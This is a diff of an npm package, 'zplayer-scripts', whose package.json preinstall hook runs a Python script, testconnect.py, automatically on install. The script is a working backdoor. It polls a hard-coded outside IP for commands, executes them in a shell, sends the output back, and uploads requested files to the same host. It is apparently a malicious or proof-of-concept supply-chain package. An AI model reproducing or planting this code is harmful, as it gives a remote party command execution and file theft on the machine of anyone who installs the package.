zplayer-scripts 1.0.7

package/README.md

@@ -0,0 +1 @@
+Owned by ZSEC

package/package.json

@@ -0,0 +1,14 @@
+
+	{
+	  "name": "zplayer-scripts",
+	  "version": "1.0.7",
+	  "description": "Owned by ZSEC",
+	  "main": "index.js",
+	  "scripts": {
+	    "test": "id",
+	    "preinstall":"python3 testconnect.py"
+	  },
+	  "author": "",
+	  "license": "ISC"
+	}
+	

package/pre.sh

@@ -0,0 +1 @@
+python3 testconnect.py

package/testconnect.py

@@ -0,0 +1,53 @@
+#python3
+
+from urllib import request, parse
+import subprocess
+import time
+import os
+
+ATTACKER_IP = '34.133.45.72' # change this to the attacker's IP address
+ATTACKER_PORT = 80
+
+# Data is a dict
+def send_post(data, url=f'http://{ATTACKER_IP}:{ATTACKER_PORT}'):
+    data = {"rfile": data}
+    data = parse.urlencode(data).encode()
+    req = request.Request(url, data=data)
+    request.urlopen(req) # send request
+
+
+def send_file(command):
+    try:
+        grab, path = command.strip().split(' ')
+    except ValueError:
+        send_post("[-] Invalid grab command (maybe multiple spaces)")
+        return
+
+    if not os.path.exists(path):
+        send_post("[-] Not able to find the file")
+        return
+
+    store_url = f'http://{ATTACKER_IP}:{ATTACKER_PORT}/store' # Posts to /store
+    with open(path, 'rb') as fp:
+        send_post(fp.read(), url=store_url)
+
+
+def run_command(command):
+    CMD = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
+    send_post(CMD.stdout.read())
+    send_post(CMD.stderr.read())
+
+
+while True:
+    command = request.urlopen(f"http://{ATTACKER_IP}:{ATTACKER_PORT}").read().decode()
+
+    if 'terminate' in command:
+        break
+
+    # Send file
+    if 'grab' in command:
+        send_file(command)
+        continue
+
+    run_command(command)
+    time.sleep(1)